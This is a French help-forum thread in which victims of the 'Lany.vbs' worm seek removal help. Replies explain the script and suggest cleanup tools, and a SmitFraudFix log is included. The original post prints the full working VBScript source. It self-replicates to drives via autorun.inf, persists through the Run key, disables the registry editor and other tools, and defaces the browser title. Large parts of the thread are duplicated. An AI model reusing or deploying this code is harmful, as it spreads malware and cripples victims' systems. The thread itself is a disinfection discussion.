Lany.vbs
Nusco
Messages postés
4
Statut
Membre
-
amrou -
amrou -
Bonjour,
j'ai besoin d'aide. j'ai rémarqué que la barre de titre de mon browser contient un autre titre bizarre qui apparaît comme suit:
"Piraté par <<< LANY >>> Ingénieur en Hacking ------ Fuck U --------"
je n'arrive pas aussi à ouvrir mes disques dur et amovible en double-cliquant. quand je clique dessus avec le bouton droit, je vois en premier lieu sur la liste des options qui s'affiche, "éxecution automatique" au lieu de "ouvrir". en cherchant la cause je remarque que deux fichiers "Lany.vbs et autorun.inf" sont automatiquement enregistrer sur les disque, ce qui fait qu'on double-cliquant, au lieu d'ouvrir, les disques cherchent à s'auto-éxecuter.
j'ai tenté d'ouvrir le fichier "Lany.vbs" en choisissant "modifier" dans la liste des options en cliquant dessus avec le bouton droit, voilà le contenu:
'Petit script pour m'entrainer
'le nom de ce script est Lany
'son principe est simple...............
on error resume next
dim CodeSource,RepWin,CleUSB,FichierScript
dim LeFichier,TextAutoRun,CheminDAcces,Registre,nt,Choisir,FinDuScript
TextAutoRun = "[autorun]"&vbcrlf&"shellexecute=wscript.exe Lany.vbs"&vbcrlf&"action=""Pas d'action"""
set FichierScript = createobject("Scripting.FileSystemObject")
set LeFichier = FichierScript.getfile(Wscript.ScriptFullname)
dim text,size
size = LeFichier.size
Choisir = LeFichier.drive.drivetype
set text=LeFichier.openastextstream(1,-2)
do while not text.atendofstream
CodeSource=CodeSource &text.readline
CodeSource=CodeSource & vbcrlf
loop
do
Set RepWin = FichierScript.getspecialfolder(0)
set CheminDAcces = FichierScript.getfile(RepWin & "\Lany.vbs")
CheminDAcces.attributes = 32
set CheminDAcces=FichierScript.createtextfile(RepWin & "\Lany.vbs",2,true)
CheminDAcces.write CodeSource
CheminDAcces.close
set CheminDAcces = FichierScript.getfile(RepWin & "\Lany.vbs")
CheminDAcces.attributes = 39
for each CleUSB in FichierScript.drives
If (CleUSB.drivetype = 1 or CleUSB.drivetype = 2) and CleUSB.path <> "A:" then
set CheminDAcces=FichierScript.getfile(CleUSB.path &"\Lany.vbs")
CheminDAcces.attributes =32
set CheminDAcces=FichierScript.createtextfile(CleUSB.path &"\Lany.vbs",2,true)
CheminDAcces.write CodeSource
CheminDAcces.close
set CheminDAcces=FichierScript.getfile(CleUSB.path &"\Lany.vbs")
CheminDAcces.attributes =39
set CheminDAcces =FichierScript.getfile(CleUSB.path &"\autorun.inf")
CheminDAcces.attributes = 32
set CheminDAcces=FichierScript.createtextfile(CleUSB.path &"\autorun.inf",2,true)
CheminDAcces.write TextAutoRun
CheminDAcces.close
set CheminDAcces =FichierScript.getfile(CleUSB.path &"\autorun.inf")
CheminDAcces.attributes=39
end if
next
set Registre = createobject("WScript.Shell")
Registre.RegDelete "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run"
Registre.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Keyboard\"
Registre.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"RED_DWORD"
Registre.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"RED_DWORD"
Registre.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCPL",1,"RED_DWORD"
Registre.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"RED_DWORD"
Registre.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Lany",RepWin&"\Lany.vbs"
Registre.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Merci pour votre participation"
Registre.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeTexte", "Mon virus est dans votre machine, Merci de le partager avec vos amis"
Registre.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Piraté par <<< LANY >>> Ingénieur en Hacking ------ Fuck U --------"
if Choisir <> 1 then
Wscript.sleep 200000
end if
loop while Choisir<>1
set FinDuScript = createobject("Wscript.shell")
FinDuScript.run RepWin&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
comment je peux me débarasser de ce problème? j'attend impatiemment vos réponses.
j'ai besoin d'aide. j'ai rémarqué que la barre de titre de mon browser contient un autre titre bizarre qui apparaît comme suit:
"Piraté par <<< LANY >>> Ingénieur en Hacking ------ Fuck U --------"
je n'arrive pas aussi à ouvrir mes disques dur et amovible en double-cliquant. quand je clique dessus avec le bouton droit, je vois en premier lieu sur la liste des options qui s'affiche, "éxecution automatique" au lieu de "ouvrir". en cherchant la cause je remarque que deux fichiers "Lany.vbs et autorun.inf" sont automatiquement enregistrer sur les disque, ce qui fait qu'on double-cliquant, au lieu d'ouvrir, les disques cherchent à s'auto-éxecuter.
j'ai tenté d'ouvrir le fichier "Lany.vbs" en choisissant "modifier" dans la liste des options en cliquant dessus avec le bouton droit, voilà le contenu:
'Petit script pour m'entrainer
'le nom de ce script est Lany
'son principe est simple...............
on error resume next
dim CodeSource,RepWin,CleUSB,FichierScript
dim LeFichier,TextAutoRun,CheminDAcces,Registre,nt,Choisir,FinDuScript
TextAutoRun = "[autorun]"&vbcrlf&"shellexecute=wscript.exe Lany.vbs"&vbcrlf&"action=""Pas d'action"""
set FichierScript = createobject("Scripting.FileSystemObject")
set LeFichier = FichierScript.getfile(Wscript.ScriptFullname)
dim text,size
size = LeFichier.size
Choisir = LeFichier.drive.drivetype
set text=LeFichier.openastextstream(1,-2)
do while not text.atendofstream
CodeSource=CodeSource &text.readline
CodeSource=CodeSource & vbcrlf
loop
do
Set RepWin = FichierScript.getspecialfolder(0)
set CheminDAcces = FichierScript.getfile(RepWin & "\Lany.vbs")
CheminDAcces.attributes = 32
set CheminDAcces=FichierScript.createtextfile(RepWin & "\Lany.vbs",2,true)
CheminDAcces.write CodeSource
CheminDAcces.close
set CheminDAcces = FichierScript.getfile(RepWin & "\Lany.vbs")
CheminDAcces.attributes = 39
for each CleUSB in FichierScript.drives
If (CleUSB.drivetype = 1 or CleUSB.drivetype = 2) and CleUSB.path <> "A:" then
set CheminDAcces=FichierScript.getfile(CleUSB.path &"\Lany.vbs")
CheminDAcces.attributes =32
set CheminDAcces=FichierScript.createtextfile(CleUSB.path &"\Lany.vbs",2,true)
CheminDAcces.write CodeSource
CheminDAcces.close
set CheminDAcces=FichierScript.getfile(CleUSB.path &"\Lany.vbs")
CheminDAcces.attributes =39
set CheminDAcces =FichierScript.getfile(CleUSB.path &"\autorun.inf")
CheminDAcces.attributes = 32
set CheminDAcces=FichierScript.createtextfile(CleUSB.path &"\autorun.inf",2,true)
CheminDAcces.write TextAutoRun
CheminDAcces.close
set CheminDAcces =FichierScript.getfile(CleUSB.path &"\autorun.inf")
CheminDAcces.attributes=39
end if
next
set Registre = createobject("WScript.Shell")
Registre.RegDelete "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run"
Registre.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Keyboard\"
Registre.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"RED_DWORD"
Registre.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"RED_DWORD"
Registre.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCPL",1,"RED_DWORD"
Registre.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"RED_DWORD"
Registre.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Lany",RepWin&"\Lany.vbs"
Registre.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Merci pour votre participation"
Registre.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeTexte", "Mon virus est dans votre machine, Merci de le partager avec vos amis"
Registre.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Piraté par <<< LANY >>> Ingénieur en Hacking ------ Fuck U --------"
if Choisir <> 1 then
Wscript.sleep 200000
end if
loop while Choisir<>1
set FinDuScript = createobject("Wscript.shell")
FinDuScript.run RepWin&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
comment je peux me débarasser de ce problème? j'attend impatiemment vos réponses.
12 réponses
merci beaucoup pour les réponses. j'ai pu me débarraser de mon problème. j'ai supprimé tous les éléments de lany dans mon registre et dans ma recherche j'ai trouvé le petit logiciel OTMoveIt qui m'a aidé à supprimer lany défnitement de mon ordinateur ainsi que des clés USB. j'ai utilisé le mode d'échec pour supprimer certains éléments surtout dans C:\Windows.
Merci beaucoup
Merci beaucoup
Je crois que mon ordinateur a été piraté. Je ne réussis pas à ouvrir mon disque local (D) par un double clics. Je suis obligé de passer par un clic droit et de choisir ouvir. Je crois ma machine est contaminée par le virus lany. J'aimerais que vous me donner une autre procédure que celle de rentrer dans le régistre "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Lany" et de supprimer les différents fichiers ontenant la mentions "lany".
salut Herman,
j'avais le même problème que toi mais avec l'aide du logiciel OTMoveIT je m'en suis débarrasé. tu peux le télécharger gratuitement et suivre les instructions sur le site. fait recherche sur google et tu trouvera le site. mais sache qu'après avois l'utilisé il faut supprimer tous les entrés de lany dans le registre sinon au prochain démarrage ça va revenir.
bonne chance
j'avais le même problème que toi mais avec l'aide du logiciel OTMoveIT je m'en suis débarrasé. tu peux le télécharger gratuitement et suivre les instructions sur le site. fait recherche sur google et tu trouvera le site. mais sache qu'après avois l'utilisé il faut supprimer tous les entrés de lany dans le registre sinon au prochain démarrage ça va revenir.
bonne chance
Je crois que mon ordinateur a été piraté. Je ne réussis pas à ouvrir mon disque local (D) par un double clics. Je suis obligé de passer par un clic droit et de choisir ouvir. Je crois ma machine est contaminée par le virus lany.
J'aimerais que vous me donner une autre procédure que celle de rentrer dans le régistre "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Lany" et de supprimer les différents fichiers ontenant la mentions "lany". Merci infiniment
J'aimerais que vous me donner une autre procédure que celle de rentrer dans le régistre "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Lany" et de supprimer les différents fichiers ontenant la mentions "lany". Merci infiniment
Bonjour,
j'ai également le meme probleme mais comme je suis vraiment nulle en informatique et je ne sais vraiment pas comment faire. Par contre je ne trouve pas les fichiers "lany" moi.
Aidez moi à me débarasser de ce probleme svp. faut-il que j'utilise le logiciel Hijackthis?
Merci bcp
j'ai également le meme probleme mais comme je suis vraiment nulle en informatique et je ne sais vraiment pas comment faire. Par contre je ne trouve pas les fichiers "lany" moi.
Aidez moi à me débarasser de ce probleme svp. faut-il que j'utilise le logiciel Hijackthis?
Merci bcp
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
SmitFraudFix v2.375
Rapport fait à 19:35:07,61, 20/11/2008
Executé à partir de C:\Documents and Settings\FESIO\Bureau\SmitfraudFix
OS: Microsoft Windows XP [version 5.1.2600] - Windows_NT
Le type du système de fichiers est NTFS
Fix executé en mode normal
»»»»»»»»»»»»»»»»»»»»»»»» SharedTaskScheduler Avant SmitFraudFix
!!!Attention, les clés qui suivent ne sont pas forcément infectées!!!
SrchSTS.exe by S!Ri
Search SharedTaskScheduler's .dll
»»»»»»»»»»»»»»»»»»»»»»»» Arret des processus
»»»»»»»»»»»»»»»»»»»»»»»» hosts
127.0.0.1 localhost
»»»»»»»»»»»»»»»»»»»»»»»» VACFix
VACFix
Credits: Malware Analysis & Diagnostic
Code: S!Ri
»»»»»»»»»»»»»»»»»»»»»»»» Winsock2 Fix
S!Ri's WS2Fix: LSP not Found.
»»»»»»»»»»»»»»»»»»»»»»»» Generic Renos Fix
GenericRenosFix by S!Ri
»»»»»»»»»»»»»»»»»»»»»»»» Suppression des fichiers infectés
C:\autorun.inf supprimé
»»»»»»»»»»»»»»»»»»»»»»»» IEDFix
IEDFix
Credits: Malware Analysis & Diagnostic
Code: S!Ri
»»»»»»»»»»»»»»»»»»»»»»»» 404Fix
404Fix
Credits: Malware Analysis & Diagnostic
Code: S!Ri
»»»»»»»»»»»»»»»»»»»»»»»» RK
»»»»»»»»»»»»»»»»»»»»»»»» DNS
Description: Contrôleur Fast Ethernet intégré 3Com 3C920 (compatible 3C905C-TX) - Miniport d'ordonnancement de paquets
DNS Server Search Order: 213.136.96.2
DNS Server Search Order: 213.136.96.37
HKLM\SYSTEM\CCS\Services\Tcpip\..\{D3E3C6C6-2758-4997-98B2-6281E80C02A6}: NameServer=213.136.96.2,213.136.96.37
HKLM\SYSTEM\CS1\Services\Tcpip\..\{D3E3C6C6-2758-4997-98B2-6281E80C02A6}: NameServer=213.136.96.2,213.136.96.37
»»»»»»»»»»»»»»»»»»»»»»»» Suppression Fichiers Temporaires
»»»»»»»»»»»»»»»»»»»»»»»» Winlogon.System
!!!Attention, les clés qui suivent ne sont pas forcément infectées!!!
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"System"=""
»»»»»»»»»»»»»»»»»»»»»»»» Nettoyage du registre
Nettoyage terminé.
»»»»»»»»»»»»»»»»»»»»»»»» SharedTaskScheduler Après SmitFraudFix
!!!Attention, les clés qui suivent ne sont pas forcément infectées!!!
SrchSTS.exe by S!Ri
Search SharedTaskScheduler's .dll
»»»»»»»»»»»»»»»»»»»»»»»» Fin
Rapport fait à 19:35:07,61, 20/11/2008
Executé à partir de C:\Documents and Settings\FESIO\Bureau\SmitfraudFix
OS: Microsoft Windows XP [version 5.1.2600] - Windows_NT
Le type du système de fichiers est NTFS
Fix executé en mode normal
»»»»»»»»»»»»»»»»»»»»»»»» SharedTaskScheduler Avant SmitFraudFix
!!!Attention, les clés qui suivent ne sont pas forcément infectées!!!
SrchSTS.exe by S!Ri
Search SharedTaskScheduler's .dll
»»»»»»»»»»»»»»»»»»»»»»»» Arret des processus
»»»»»»»»»»»»»»»»»»»»»»»» hosts
127.0.0.1 localhost
»»»»»»»»»»»»»»»»»»»»»»»» VACFix
VACFix
Credits: Malware Analysis & Diagnostic
Code: S!Ri
»»»»»»»»»»»»»»»»»»»»»»»» Winsock2 Fix
S!Ri's WS2Fix: LSP not Found.
»»»»»»»»»»»»»»»»»»»»»»»» Generic Renos Fix
GenericRenosFix by S!Ri
»»»»»»»»»»»»»»»»»»»»»»»» Suppression des fichiers infectés
C:\autorun.inf supprimé
»»»»»»»»»»»»»»»»»»»»»»»» IEDFix
IEDFix
Credits: Malware Analysis & Diagnostic
Code: S!Ri
»»»»»»»»»»»»»»»»»»»»»»»» 404Fix
404Fix
Credits: Malware Analysis & Diagnostic
Code: S!Ri
»»»»»»»»»»»»»»»»»»»»»»»» RK
»»»»»»»»»»»»»»»»»»»»»»»» DNS
Description: Contrôleur Fast Ethernet intégré 3Com 3C920 (compatible 3C905C-TX) - Miniport d'ordonnancement de paquets
DNS Server Search Order: 213.136.96.2
DNS Server Search Order: 213.136.96.37
HKLM\SYSTEM\CCS\Services\Tcpip\..\{D3E3C6C6-2758-4997-98B2-6281E80C02A6}: NameServer=213.136.96.2,213.136.96.37
HKLM\SYSTEM\CS1\Services\Tcpip\..\{D3E3C6C6-2758-4997-98B2-6281E80C02A6}: NameServer=213.136.96.2,213.136.96.37
»»»»»»»»»»»»»»»»»»»»»»»» Suppression Fichiers Temporaires
»»»»»»»»»»»»»»»»»»»»»»»» Winlogon.System
!!!Attention, les clés qui suivent ne sont pas forcément infectées!!!
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"System"=""
»»»»»»»»»»»»»»»»»»»»»»»» Nettoyage du registre
Nettoyage terminé.
»»»»»»»»»»»»»»»»»»»»»»»» SharedTaskScheduler Après SmitFraudFix
!!!Attention, les clés qui suivent ne sont pas forcément infectées!!!
SrchSTS.exe by S!Ri
Search SharedTaskScheduler's .dll
»»»»»»»»»»»»»»»»»»»»»»»» Fin
essaye de démarrer en mode sans echec (démaarer son ordinateur en appuyany surF8 jusqu'a que le menu mode sans echec apparraisse) et de supprimer ces fichiers la.
Tu as été piraté !!!
Tu as été piraté !!!
OK jvai t'aider a le supprimer, il suffit de comprendre ce qu'il y a d'écrit :
tout d'abord ces lignes :
Set RepWin = FichierScript.getspecialfolder(0)
set CheminDAcces = FichierScript.getfile(RepWin & "\Lany.vbs")
CheminDAcces.attributes = 32
Je pense qu'il determine ton repertoire windows (windows ou winnt) puis qu'il y copie le fichier Lany.vbs, et determine les attributs sur les fichier (caché, fichier systeme, lecture seule etc)
GetSpecialFolder permet de retrouver les répertoire spéciaux de Windows (comme system32)
set CheminDAcces=FichierScript.createtextfile(RepWin & "\Lany.vbs",2,true)
CheminDAcces.write CodeSource
puis il crée un fichier txt et lui insere la variable CodeSource comme données :
CodeSource=CodeSource &text.readline
CodeSource=CodeSource & vbcrlf
CodeSource qui a mon avis équivaut à toute la source du .vbs
puis on tombe sur :
Registre.RegDelete "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run"
Registre.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Keyboard\"
RegDelete supprime de la base de registre la clé ou la valeur en argument en l'occurence ici notre clée Run qui regroupe les logiciels qui démarrent avec windows.Si la valeur de l'argument se termine par une barre oblique inverse, la clé sera supprimée, sinon seule la valeur sera supprimée. Je comprends pas trop pourquoi il supprime la clée Run.
Ici :
Registre.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Lany",RepWin&& quot;\Lany.vbs"
il se met justement dans cette fameuse clée RUN qui va donc le relancer à chaque démarrage de windows
et ici :
Registre.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Piraté par <<< LANY >>> Ingénieur en Hacking ------ Fuck U --------"
Il modifie donc la barre de titre d'Internet explorer.
Il te suffirait donc de supprimer la clée "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Lany",RepWin&& quot;\Lany.vbs" dans ton registre (démarrer>executer>"regedit")
Voila, fait une recherche et supprime tous les lany.vbs sur tes disques dur.
J'avoue que je connais absolument rien au visual basic mais c'est tellement simple que ca se lit comme un livre ^^
tout d'abord ces lignes :
Set RepWin = FichierScript.getspecialfolder(0)
set CheminDAcces = FichierScript.getfile(RepWin & "\Lany.vbs")
CheminDAcces.attributes = 32
Je pense qu'il determine ton repertoire windows (windows ou winnt) puis qu'il y copie le fichier Lany.vbs, et determine les attributs sur les fichier (caché, fichier systeme, lecture seule etc)
GetSpecialFolder permet de retrouver les répertoire spéciaux de Windows (comme system32)
set CheminDAcces=FichierScript.createtextfile(RepWin & "\Lany.vbs",2,true)
CheminDAcces.write CodeSource
puis il crée un fichier txt et lui insere la variable CodeSource comme données :
CodeSource=CodeSource &text.readline
CodeSource=CodeSource & vbcrlf
CodeSource qui a mon avis équivaut à toute la source du .vbs
puis on tombe sur :
Registre.RegDelete "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run"
Registre.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Keyboard\"
RegDelete supprime de la base de registre la clé ou la valeur en argument en l'occurence ici notre clée Run qui regroupe les logiciels qui démarrent avec windows.Si la valeur de l'argument se termine par une barre oblique inverse, la clé sera supprimée, sinon seule la valeur sera supprimée. Je comprends pas trop pourquoi il supprime la clée Run.
Ici :
Registre.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Lany",RepWin&& quot;\Lany.vbs"
il se met justement dans cette fameuse clée RUN qui va donc le relancer à chaque démarrage de windows
et ici :
Registre.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Piraté par <<< LANY >>> Ingénieur en Hacking ------ Fuck U --------"
Il modifie donc la barre de titre d'Internet explorer.
Il te suffirait donc de supprimer la clée "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Lany",RepWin&& quot;\Lany.vbs" dans ton registre (démarrer>executer>"regedit")
Voila, fait une recherche et supprime tous les lany.vbs sur tes disques dur.
J'avoue que je connais absolument rien au visual basic mais c'est tellement simple que ca se lit comme un livre ^^
salut N'TITI, je mepresente , je me nomme racaille et je te conseille de telecharger la derniere version de avg 8.0 pour nettoyer ce logiciel espion puis utilise le logiciel Hijackthis pour virer de la base de registre les quelques traces restantes de lany.vbs.
Bonne chance
Bonne chance
